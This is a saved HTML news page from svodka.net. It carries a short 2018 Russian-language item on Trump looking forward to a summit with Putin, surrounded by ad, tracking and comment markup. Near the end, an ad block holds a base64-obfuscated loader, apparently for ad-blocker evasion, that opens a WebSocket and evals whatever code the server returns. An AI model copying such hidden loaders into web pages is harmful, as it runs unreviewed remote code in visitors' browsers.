<!--   --> 



<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru-ru" lang="ru-ru" >


	<head>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-112080774-1"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-112080774-1');
</script>

	 <code><script src="//ajax.googleapis.com/ajax/libs/mootools/1.4.5/mootools-yui-compressed.js"></script></code>
<!-- <code><script type="text/javascript" src="http://www.google.com/jsapi"></script><br /><script type="text/javascript">google.load("mootools", "1.1.2");</script></code> -->

	   <base href="http://svodka.net/" />
  <meta http-equiv="content-type" content="text/html; charset=utf-8" />
  <meta name="robots" content="index, follow" />
  <meta name="keywords" content="новости мира, видео, видео сводки, трамп, заявил, что, унн, со своим" />
  <meta name="title" content="Трамп заявил, что с нетерпением ждет встречи с Путиным - Новости Украины - Новини України - Сводка.нет" />
  <meta name="author" content="" />
  <meta name="description" content="киев. 28 июня. унн. президент сша дональд трамп надеется, что встреча со своим российским коллегой владимиром путиным, будет “замечательной”. об этом хозяин белого дома заявил отвечая на вопрос сми относительно его ожиданий от саммита, передает унн со ссылкой на “голос америки”. “мы с нетерпением жд" />
  <meta name="generator" content="Svodka.net - Новости Украины и Мира" />
  <title>Трамп заявил, что с нетерпением ждет встречи с Путиным - Новости Украины - Новини України - Сводка.нет</title>
  <link href="/component/jcomments/feed/com_content/2594" rel="alternate" type="application/rss+xml" title="Трамп заявил, что с нетерпением ждет встречи с Путиным" />
  <link href="/video/video-svodki/2594" rel="canonical"  />
  <link href="/templates/rt_terrantribune_j15/favicon.ico" rel="shortcut icon" type="image/x-icon" />
  <link rel="stylesheet" href="http://svodka.net/plugins/content/slimbox/slimbox.css" type="text/css" />
  <link rel="stylesheet" href="/components/com_jcomments/tpl/default/style.css?v=21" type="text/css" />
  <script type="text/javascript" src="/media/system/js/mootools.js"></script>
  <script type="text/javascript" src="/media/system/js/caption.js"></script>
  <script type="text/javascript" src="http://svodka.net/plugins/content/slimbox/slimbox.js"></script>
  <script type="text/javascript" src="/components/com_jcomments/js/jcomments-v2.3.js?v=8"></script>
  <script type="text/javascript" src="/components/com_jcomments/libraries/joomlatune/ajax.js?v=4"></script>

		
<link rel="shortcut icon" href="/images/favicon.ico" />
<link href="/templates/rt_terrantribune_j15/css/template_css.css" rel="stylesheet" type="text/css" />
<style type="text/css">
	div.wrapper { margin: 0 auto; width: 962px;padding:0;}
	#left-column { width:0px;padding:0;}
	#right-column { width:320px;padding:0;}
	#center-column { margin-left:0px;margin-right:320px;padding:0;}
</style>
<script type="text/javascript" src="/templates/rt_terrantribune_j15/js/rokutils.js"></script>
 
	


       <meta name="google-site-verification" content="tErsLIaLenGi4VxJzsAo_jKkLgRmMybXzoHELllRPvo" />
<meta name="google-site-verification" content="dYNba2cNrXwBY-0kGRI1vvZ-UUGqyRwfzfIGlSiY_J4" />
<meta name='yandex-verification' content='52c7107842c026f6' />
<meta name="verify-v1" content="TNwN5fqE/PtyssHKqkbzkjLbGOi3BHvpcuJ58WvwoC4=" />
        <meta name="norton-safeweb-site-verification" content="nx13z30e2le1p8iffnw3i2r11fzjmgtcn86g099rqa23ny25iflyodar3sgdwqpgrzwsf0ap4szwn8vsfkrh0sh61cri208nw0n37rp21vcc8rjiylnjg0-9l55z92-9"/>
<meta name="msvalidate.01" content="3DD71D75A69191C90A139032984EF6A9" />


<script type="text/javascript" src="/plugins/system/rokbox/rokbox.js"></script>
<link href="/plugins/system/rokbox/themes/dark/rokbox-style.css" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/plugins/system/rokbox/themes/dark/rokbox-config.js"></script>
</head>

<!--
<script>
function AsyncLoad()
{
var l = arguments.length;
for (var i=0;i<l;i++)
{
document.write("<script src='" + arguments[i] + "'></" + "script>");
}
}
AsyncLoad(
"media/system/js/mootools.js",
"media/system/js/caption.js",
"modules/mod_joomulus/swfobject.js");
</script>
-->

	<body id="ff-" class="f- bc-red iehandle">


		<div id="page-bg">
		<!-- Begin Wrapper -->
		<div class="wrapper">
						<div class="shadow-left">
				<div class="shadow-right">
					<div class="main-page">
						<div class="main-page2">
							<div class="main-page3">
								<div class="main-page4">
									<!-- Begin Header -->
									<div id="header">
																					<a href="" class="nounder"><img src="/templates/rt_terrantribune_j15/images/blank.gif" border="0" alt="" id="logo" /></a>
																													</div>
									<!-- End Header -->
									<!-- Begin Horizontal Menu -->
									<div id="horiz-menu" class="splitmenu">
																					<ul class="menutop"><li class="parent red item1"><a href="http://svodka.net/" class="topdaddy"><span>Главная</span></a></li><li class="red item113"><a href="/poslednie-svodki"><span>Новости</span></a></li><li class="red item111"><a href="/politika"><span>Политика</span></a></li><li class="red item26"><a href="/mir"><span>Мир</span></a></li><li class="red item29"><a href="/ekonomika"><span>Экономика</span></a></li><li class="red item31"><a href="/analitika"><span>Аналитика</span></a></li><li class="red item110"><a href="/sobitiya"><span>События</span></a></li><li class="red item118"><a href="/poisk"><span>Поиск</span></a></li><li class="red item119"><a href="https://twitter.com/SvodkaNews" target="_blank"><span>ТВИТТЕР</span></a></li></ul>																			</div>
																			<div id="sub-menu">
																					</div>
																		<!-- End Horizontal Menu -->
									<!-- Begin Showcase Area -->
																			<div class="showcase-div"></div>
																		<!-- End Showcase Area -->
									<!-- Begin Main Content Area -->
									<div id="main-section">
										<div class="padding">
											<div class="main-content block">
												<!-- Begin Left Column -->
																								<!-- End Left Column -->
												<!-- Begin Right Column -->


																								<div id="right-column">
													<div class="padding">
														<div id="rightmodules" class="spacer">
																																												</div>
																														<div class="module">
			<div>
				<div>
					<div>
											<?php
include( "bodyclick_162284.php" );
?>					</div>
				</div>
			</div>
		</div>
			<div class="module">
			<div>
				<div>
					<div>
											<noindex><div id="DIV_DA_108594"></div></noindex>					</div>
				</div>
			</div>
		</div>
			<div class="module">
			<div>
				<div>
					<div>
											<noindex>
<div id="smi2adblock_43177"><a href="http://smi2.ru/">Новости СМИ2</a></div>

<script type="text/javascript" charset="windows-1251">
  (function() {
    var sc = document.createElement('script'); sc.type = 'text/javascript'; sc.async = true;
    sc.src = 'http://js.smi2.ru/data/js/43177.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(sc, s);
  }());
</script>
</noindex>					</div>
				</div>
			</div>
		</div>
			<div class="module">
			<div>
				<div>
					<div>
											<noindex><div id="DIV_DA_64457"></div></noindex>					</div>
				</div>
			</div>
		</div>
			<div class="module">
			<div>
				<div>
					<div>
											<noindex>
<div id="NM484" style="text-align:center;display:none" ><a
href="http://www.novostimira.com.ua" id="NM484t" style="display:none"
target="_blank"><strong>Новости</strong></a></div>
<!-- before </body> -->
<script type="text/javascript">
    var el = document.getElementById('NM484');
    if (el) {
        if (document.getElementById('NM484t').style.display == 'none') {
            document.getElementById('NM484t').style.display = '';
            var dateNM = new Date();
            var t = Math.floor(dateNM.getTime()/(1000*600));
            var NMces=document.createElement('script');
            NMces.type = 'text/javascript';
            NMces.charset = 'UTF-8';
            NMces.src='http://n.novostimira.biz/484?v='+t;
            el.parentNode.appendChild(NMces);
        }
    }
</script>
</noindex>					</div>
				</div>
			</div>
		</div>
			<div class="module">
			<div>
				<div>
					<div>
											<!--  News Join -->
<noindex>
<!-- In the place of insertion -->
<style>
.join_informer_1352 {text-align:left; clear: both; padding: 5px;}
.join_informer_1352 a.join_link, a.join_text {text-transform: none; font-size: 12px; font-family: Tahoma; padding: 0px 0px 0px 0px; margin:0px 0px 10px 0px;color:#8f0b0b;text-decoration:none; font-weight:bold;}
.join_informer_1352 a.join_link:hover, a.join_text:hover {text-transform: none; font-size: 12px; font-family: Tahoma; padding: 0px 0px 0px 0px; margin:0px 0px 10px 0px;color:#0657ba;text-decoration:underline;}
.join_informer_1352 .join_img {width: 80px; height: 80px; }
</style>

<div class="join_informer_1352" id="join_informer_1352">
<a href="http://weather.join.ua">Погода</a>, <a href="http://news.join.ua">Новости</a>, загрузка...
</div>
</noindex>					</div>
				</div>
			</div>
		</div>
			<div class="module">
			<div>
				<div>
					<div>
											<script type="text/javascript">
var bntuniqid = 'hV4gUTeRPrmWmGUO5KdV';
var bntuniqsid = '58000';
var async = 0;
</script>
<script type="text/javascript" src="//dewife.ru/news.js"></script>					</div>
				</div>
			</div>
		</div>
			<div class="module">
			<div>
				<div>
					<div>
											<noindex>
<script language="Javascript">
var bntuniqid = 'SOBC165pzd0m5q82sxA5';
var bntuniqsid = '58000';
var async = 0;
</script>
<script type="text/javascript" src="http://gredinatib.info/viewt.js"></script>
</noindex>					</div>
				</div>
			</div>
		</div>
	
														<div id="rightmodules2" class="spacer">
																																												</div>
													</div>
									 			</div>
																								<!-- End Right Column -->
												<!-- Begin Center Column -->
												<div id="center-column">
													<div class="padding">
																																										
														<table class="contentpaneopen">

<!-- 468*60 Advertur.ru start -->
<!-- <script type="text/javascript" src="http://ddnk.advertur.ru/v1/code.js?id=29937"></script> -->
<!-- 468*60 Advertur.ru end -->

<tr>
		<td class="contentheading" width="100%">
					Трамп заявил, что с нетерпением ждет встречи с Путиным			</td>
				
		
					</tr>
</table>

<table class="contentpaneopen">

<tr>
	<td valign="top" class="createdate">
		29.06.2018 03:59	</td>
</tr>




<!--
<script type="text/javascript">
//<![CDATA[
yandex_partner_id = 86715;
yandex_site_bg_color = 'FFFFFF';
yandex_site_charset = 'windows-1251';
yandex_ad_format = 'direct';
yandex_font_size = 1.2;
yandex_direct_type = 'flat';
yandex_direct_limit = 2;
yandex_stat_id = 1;
yandex_direct_title_font_size = 3;
yandex_direct_bg_color = 'FFFFFF';
yandex_direct_title_color = '990000';
yandex_direct_url_color = '333333';
yandex_direct_all_color = '333333';
yandex_direct_text_color = '333333';
yandex_direct_hover_color = 'CC0000';
yandex_direct_favicon = false;
document.write('<sc'+'ript type="text/javascript" src="http://an.yandex.ru/system/context.js"></sc'+'ript>');
//]]>
</script> -->



<tr>
<td valign="top">
<div id="hypercontext"><index><p>Президент США Дональд Трамп надеется, что встреча со&nbsp;своим
российским коллегой Владимиром Путиным, будет “замечательной”.
Об&nbsp;этом хозяин Белого дома заявил отвечая на&nbsp;вопрос СМИ
относительно его ожиданий от&nbsp;саммита, передает со&nbsp;ссылкой
на&nbsp;“Голос Америки”.</p>
<p>“Мы&nbsp;с&nbsp;нетерпением ждем встречи. Если&nbsp;бы
мы&nbsp;все могли найти общий язык, то&nbsp;было&nbsp;бы
замечательно”,&nbsp;— отметил президент, который в&nbsp;данный
момент находится в&nbsp;штате Висконсин на&nbsp;новом предприятии
тайваньской компании Foxconn, которая является подрядчиком Apple
и&nbsp;собирающей для нее технику.</p>
<p>“Мир должен начать жить дружно”,&nbsp;— заявил Дональд Трамп,
говоря о&nbsp;темах общения с&nbsp;Путиным.</p>
<p>Напомним, в&nbsp;среду помощник президента РФ&nbsp;Юрий Ушаков
заявил, что Москва и&nbsp;Вашингтон согласовали время и&nbsp;место
проведения встречи лидеров двух стран. По&nbsp;его словам,
подробности будут объявлены 28&nbsp;июня. После этого Трамп заявил,
что, вероятно, встретится с&nbsp;Путиным во&nbsp;время своей
поездки в&nbsp;Европу.</p>
<p>Как сообщал , вице-президент США Майкл Пенс ранее рассказал, что
Трамп обсудит со&nbsp;своим коллегой В.Путиным широкий круг
вопросов, включая экономические связи, ситуацию в&nbsp;Украине
и&nbsp;Сирии.</p>
<p><i><a href=
"http://svodka.net/">Сводка.нет&nbsp;-&nbsp;Новости&nbsp;Украины&nbsp;и&nbsp;Мира</a></i></p></index></div><br><br><div  align='left' style='background-color:#efefef';>Теги: <a href='/poisk?areas[0]=content&amp;searchword=%D0%BD%D0%BE%D0%B2%D0%BE%D1%81%D1%82%D0%B8+%D0%BC%D0%B8%D1%80%D0%B0'>новости мира</a>&nbsp;&nbsp;<a href='/poisk?areas[0]=content&amp;searchword=%D0%B2%D0%B8%D0%B4%D0%B5%D0%BE'>видео</a>&nbsp;&nbsp;<a href='/poisk?areas[0]=content&amp;searchword=%D0%B2%D0%B8%D0%B4%D0%B5%D0%BE+%D1%81%D0%B2%D0%BE%D0%B4%D0%BA%D0%B8'>видео сводки</a>&nbsp;&nbsp;<a href='/poisk?areas[0]=content&amp;searchword=%D1%82%D1%80%D0%B0%D0%BC%D0%BF'>трамп</a>&nbsp;&nbsp;<a href='/poisk?areas[0]=content&amp;searchword=%D0%B7%D0%B0%D1%8F%D0%B2%D0%B8%D0%BB'>заявил</a>&nbsp;&nbsp;<a href='/poisk?areas[0]=content&amp;searchword=%D1%87%D1%82%D0%BE'>что</a>&nbsp;&nbsp;<a href='/poisk?areas[0]=content&amp;searchword=%D1%83%D0%BD%D0%BD'>унн</a>&nbsp;&nbsp;<a href='/poisk?areas[0]=content&amp;searchword=%D1%81%D0%BE%C2%A0%D1%81%D0%B2%D0%BE%D0%B8%D0%BC'>со своим</a>&nbsp;&nbsp;</div>


</td>
</tr>

</table>

<div id="CNM1596" style="text-align:center;display:none" ><a
href="http://www.novostimira.com.ua" id="CNM1596t" style="display:none"
target="_blank"><strong>Новости</strong></a></div>
<!-- before </body> -->
<script type="text/javascript">
    var el = document.getElementById('CNM1596');
    if (el) {
        if (document.getElementById('CNM1596t').style.display == 'none') {
            document.getElementById('CNM1596t').style.display = '';
            var dateNM = new Date();
            var t = Math.floor(dateNM.getTime()/(1000*600));
            var NMces=document.createElement('script');
            NMces.type = 'text/javascript';
            NMces.charset = 'UTF-8';
            NMces.src='http://c.novostimira.biz/l/1596?v='+t;
            el.parentNode.appendChild(NMces);
        }
    }
</script>

<!--

<script type="text/javascript">
//<![CDATA[
yandex_partner_id = 86715;
yandex_site_bg_color = 'FFFFFF';
yandex_site_charset = 'windows-1251';
yandex_ad_format = 'direct';
yandex_font_size = 1.2;
yandex_direct_type = 'flat';
yandex_direct_limit = 3;
yandex_stat_id = 2;
yandex_direct_title_font_size = 3;
yandex_direct_bg_color = 'FFFFFF';
yandex_direct_title_color = '000099';
yandex_direct_url_color = '000000';
yandex_direct_text_color = '000000';
yandex_direct_hover_color = 'CC0000';
yandex_direct_favicon = true;
N = yandex_stat_id; // nomer pozicii bloka
Mmax = 4; // kolichestvo testiruemyx oformlenij dlya pozicii
adn = Math.floor(Math.random() * Mmax) + 1;
yadid = N.toString() + adn.toString();
yandex_stat_id = parseInt(yadid);
if (adn == 1) yandex_direct_title_color = '000099';
if (adn == 2) yandex_direct_title_color = '009900';
if (adn == 3) yandex_direct_title_color = 'CC0000';
if (adn == 4) yandex_direct_title_color = 'D12E2E';
document.write('<sc'+'ript type="text/javascript" src="http://an.yandex.ru/system/context.js"></sc'+'ript>');
//]]>
</script> -->

<div style="font-color:red;font-size:small;font-weight:bold;">              
&nbsp;Поделитесь статьей с друзьями

<div class="share42init"></div>
<script type="text/javascript" src="http://svodka.net/social/share42.js"></script>

</div>

<span class="article_separator">&nbsp;</span>
<script type="text/javascript">
<!--
var jcomments=new JComments(2594, 'com_content','/index.php?option=com_jcomments&amp;tmpl=component');
jcomments.setList('comments-list');
//-->
</script>
<div id="jc">
<h4>Добавить комментарий</h4>
<a id="addcomments" href="#addcomments"></a>
<form id="comments-form" name="comments-form" action="javascript:void(null);">
<p>
	<span>
		<input id="comments-form-name" type="text" name="name" value="" maxlength="20" size="22" tabindex="1" />
		<label for="comments-form-name">Имя (обязательное)</label>
	</span>
</p>
<p>
	<span>
		<textarea id="comments-form-comment" name="comment" cols="65" rows="8" tabindex="5"></textarea>
	</span>
</p>
<p>
	<span>
		<img class="captcha" onclick="jcomments.clear('captcha');" id="comments-form-captcha-image" src="/index.php?option=com_jcomments&amp;task=captcha&amp;tmpl=component&amp;ac=28731" width="121" height="60" alt="Защитный код" /><br />
		<span class="captcha" onclick="jcomments.clear('captcha');">Обновить</span><br />
		<input class="captcha" id="comments-form-captcha" type="text" name="captcha_refid" value="" size="5" tabindex="6" /><br />
	</span>
</p>
<div id="comments-form-buttons">
	<div class="btn" id="comments-form-send"><div><a href="#" tabindex="7" onclick="jcomments.saveComment();return false;" title="Отправить (Ctrl+Enter)">Отправить</a></div></div>
	<div class="btn" id="comments-form-cancel" style="display:none;"><div><a href="#" tabindex="8" onclick="return false;" title="Отменить">Отменить</a></div></div>
	<div style="clear:both;"></div>
</div>
<div>
	<input type="hidden" name="object_id" value="2594" />
	<input type="hidden" name="object_group" value="com_content" />
</div>
</form>
<script type="text/javascript">
<!--
function JCommentsInitializeForm()
{
	var jcEditor = new JCommentsEditor('comments-form-comment', true);
	jcEditor.initSmiles('http://svodka.net/components/com_jcomments/images/smiles');
	jcEditor.addSmile(':D','laugh.gif');
	jcEditor.addSmile(':lol:','lol.gif');
	jcEditor.addSmile(':-)','smile.gif');
	jcEditor.addSmile(';-)','wink.gif');
	jcEditor.addSmile('8)','cool.gif');
	jcEditor.addSmile(':-|','normal.gif');
	jcEditor.addSmile(':-*','whistling.gif');
	jcEditor.addSmile(':oops:','redface.gif');
	jcEditor.addSmile(':sad:','sad.gif');
	jcEditor.addSmile(':cry:','cry.gif');
	jcEditor.addSmile(':o','surprised.gif');
	jcEditor.addSmile(':-?','confused.gif');
	jcEditor.addSmile(':-x','sick.gif');
	jcEditor.addSmile(':eek:','shocked.gif');
	jcEditor.addSmile(':zzz','sleeping.gif');
	jcEditor.addSmile(':P','tongue.gif');
	jcEditor.addSmile(':roll:','rolleyes.gif');
	jcEditor.addSmile(':sigh:','unsure.gif');
	jcEditor.addCounter(1000, 'Осталось:', ' символов', 'counter');
	jcomments.setForm(new JCommentsForm('comments-form', jcEditor));
}

if (window.addEventListener) {window.addEventListener('load',JCommentsInitializeForm,false);}
else if (document.addEventListener){document.addEventListener('load',JCommentsInitializeForm,false);}
else if (window.attachEvent){window.attachEvent('onload',JCommentsInitializeForm);}
else {if (typeof window.onload=='function'){var oldload=window.onload;window.onload=function(){oldload();JCommentsInitializeForm();}} else window.onload=JCommentsInitializeForm;} 
//-->
</script>
<div id="comments"></div>

 
<div id="comments-footer" align="center"></div>


<script type="text/javascript">
<!--
jcomments.setAntiCache(0,1,0);
//-->
</script> 
</div>

																											</div>
												</div>
												<div class="clr"><div id="DIV_DA_65620"></div></div>
												<!-- End Center Column -->
											</div>
											<!-- Begin Modules Block 1 -->
																						<!-- End Modules Block 1 -->
											<!-- Begin Modules Block 2 -->
																						<!-- End Modules Block 2 -->
										</div>
									</div>
									<!-- End Main Content Area -->
									<!-- Begin Bottom Menu -->
																			<div id="bottom-menu">
													<div class="moduletable">
					<a href="http://svodka.net/index.php?option=com_rd_rss&id=1&feed=yandex">RSS</a>		</div>
	
										</div>
																		<!-- End Bottom Menu -->
									<!-- Begin Bottom Modules -->
																		<!-- End Bottom Modules -->
									<!-- Begin Footer -->
									<div id="footer">
										<div class="footer-left">
											<div class="footer-right">
<!--LiveInternet counter--><noindex><script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"target=_blank><img src='//counter.yadro.ru/hit?t14.1;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: number of pageviews for 24 hours,"+
" of visitors for 24 hours and for today is shown' "+
"border='0' width='88' height='31'><\/a>")
// </script><noindex><!--/LiveInternet-->

<!-- begin of Top100 logo -->
<noindex><a href="http://top100.rambler.ru/home?id=1963432" target="_blank"><img src="http://top100-images.rambler.ru/top100/banner-88x31-rambler-gray2.gif" alt="Rambler's Top100" width="88" height="31" border="0" /></a></noindex>
<!-- end of Top100 logo -->
 
<!-- Yandex.Metrika informer -->
<noindex>
<a href="http://metrika.yandex.ru/stat/?id=20768044&amp;from=informer"
target="_blank" rel="nofollow"><img src="//bs.yandex.ru/informer/20768044/3_0_E0E0E0FF_C0C0C0FF_1_pageviews"
style="width:88px; height:31px; border:0;" alt="Яндекс.Метрика" title="Яндекс.Метрика: данные за сегодня (просмотры, визиты и уникальные посетители)" onclick="try{Ya.Metrika.informer({i:this,id:20768044,lang:'ru'});return false}catch(e){}"/></a></noindex>
<!-- /Yandex.Metrika informer -->


<!-- Yandex.Metrika counter -->
<script type="text/javascript">
(function (d, w, c) {
    (w[c] = w[c] || []).push(function() {
        try {
            w.yaCounter20768044 = new Ya.Metrika({id:20768044,
                    webvisor:true,
                    clickmap:true,
                    trackLinks:true,
                    accurateTrackBounce:true});
        } catch(e) { }
    });

    var n = d.getElementsByTagName("script")[0],
        s = d.createElement("script"),
        f = function () { n.parentNode.insertBefore(s, n); };
    s.type = "text/javascript";
    s.async = true;
    s.src = (d.location.protocol == "https:" ? "https:" : "http:") + "//mc.yandex.ru/metrika/watch.js";

    if (w.opera == "[object Opera]") {
        d.addEventListener("DOMContentLoaded", f, false);
    } else { f(); }
})(document, window, "yandex_metrika_callbacks");
</script>
<noscript><div><img src="//mc.yandex.ru/watch/20768044" style="position:absolute; left:-9999px;" alt="" /></div></noscript>
<!-- /Yandex.Metrika counter -->


&nbsp;&nbsp;&nbsp;

<center>2008-2018 &copy; <a href="http://www.svodka.net/"> Svodka.net - Новости Украины и Мира.</a> Все права защищены</center>
<center>Personalized Childrens Books <a href="http://www.kidzname.com/" target="_blank"> Personalised Kids Books</a> Personalised Kids Books</center> 
<center>3D Human Drone <a href="http://www.terradr.one/" target="_blank"> 3D Human Drone</a> 3D Human Drone</center>
																									<div class="footer-mod">
														
													</div>
																							</div>
										</div>
									</div>
									<!-- End Footer -->
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
			<div class="debug">
				
			</div>
		</div>
		<!-- End Wrapper -->
		</div>


		
		<!-- Вставьте эту строку перед закрывающим тэгом </BODY> -->
<!-- <noindex><script charset="windows-1251" type="text/javascript" src="http://nnn.novoteka.ru/show.cgi?adp=7377&div=DIV_NNN_7377"></script></noindex> -->

<!-- begin of Top100 code -->
<!-- <script id="top100Counter" type="text/javascript" src="http://counter.rambler.ru/top100.jcn?1963432"></script><noscript><img src="http://counter.rambler.ru/top100.cnt?1963432" alt="" width="1" height="1" border="0"/></noscript> -->
<!-- end of Top100 code -->
<!-- pered </body> -->
<!-- <noindex><script language="javascript" type="text/javascript" src="http://js.redtram.com/n4p/upload/17/17963.informer.js"></script></noindex> -->

<!-- Before </body> -->
<noindex><script src="http://partner.join.com.ua/informers/1352/"></script></noindex> 
<noindex><script>ShowInformer(document.getElementById("join_informer_1352"));</script> </noindex>
<!--  News Join -->

<noindex><script charset="windows-1251" type="text/javascript" src="http://code.directadvert.ru/show.cgi?adp=64457&div=DIV_DA_64457"></script></noindex>
<!-- <noindex><script charset="windows-1251" type="text/javascript" src="http://code.directadvert.ru/show.cgi?adp=64555&div=DIV_DA_64555"></script></noindex> -->
<!-- <noindex><script charset="windows-1251" type="text/javascript" src="http://code.directadvert.ru/show.cgi?adp=82468&div=DIV_DA_82468"></script></noindex> -->
<noindex><script charset="windows-1251" type="text/javascript" src="http://code.directadvert.ru/show.cgi?adp=108594&div=DIV_DA_108594"></script></noindex>
<!-- <noindex><script charset="windows-1251" type="text/javascript" src="http://code.directadvert.ru/show.cgi?adp=64456&div=DIV_DA_64456"></script></noindex> -->

<!-- begin of Top100 code -->
<noindex><script id="top100Counter" type="text/javascript" src="http://counter.rambler.ru/top100.jcn?1963432"></script></noindex><noscript><img src="http://counter.rambler.ru/top100.cnt?1963432" alt="" width="1" height="1" border="0"/></noscript>
<!-- end of Top100 code -->

<!-- google -->
<script type="text/javascript">

  var _gaq = _gaq || [];
  _gaq.push(['_setAccount', 'UA-12394982-1']);
  _gaq.push(['_trackPageview']);

  (function() {
    var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
    ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
  })();

</script>

<!-- redtram -->
<script id="r19397" type="text/javascript">
    (function() {
        var worker19397,
            tickerID = 19397,
            tag = document.getElementById('r'+ tickerID),
            id = (function(tickerID) {
                var now = Math.floor((new Date()).getTime() / 1000 / 3600) * 3600;
                if ('btoa' in window)
                    return btoa('g4p_'+ tickerID +'_'+ now).replace(/[^a-zA-Z0-9]/, '');
                return 'g4p_'+ tickerID +'_'+ now;
            })(tickerID);

        var script = document.createElement('script');
            script.src = '//js-goods.redtram.com/0/19/ticker_19397.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9nNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKC95YW5kZXh8eWFicm93c2VyL2kudGVzdChuYXZpZ2F0b3IudXNlckFnZW50KSkgd3NzVXJsID0gIndzczovL2c0cC5ncnQwMS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker19397.postMessage(data);
                }

                worker19397 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker19397.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker19397.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
</script>

	</body>
</html>
